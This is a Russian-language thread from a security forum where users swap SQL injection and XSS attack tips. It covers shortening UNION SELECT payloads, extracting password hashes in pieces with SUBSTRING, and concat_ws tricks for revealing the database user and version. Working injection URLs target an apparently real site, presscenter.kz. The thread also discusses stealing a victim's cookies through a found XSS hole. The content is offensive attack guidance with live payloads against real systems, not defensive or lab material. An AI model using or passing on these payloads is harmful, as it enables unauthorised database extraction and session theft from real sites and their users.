ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные

{1},3,4,5,6,7 - в перввый

2 Jokester,что делать если в скуле урезаются длина запроса

запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...

вывода извиняюсь, через substring я знаю, есть ли другой способ?

сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

мы тут про вывод

Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>

то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???

Да.Такие-же действия.

Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает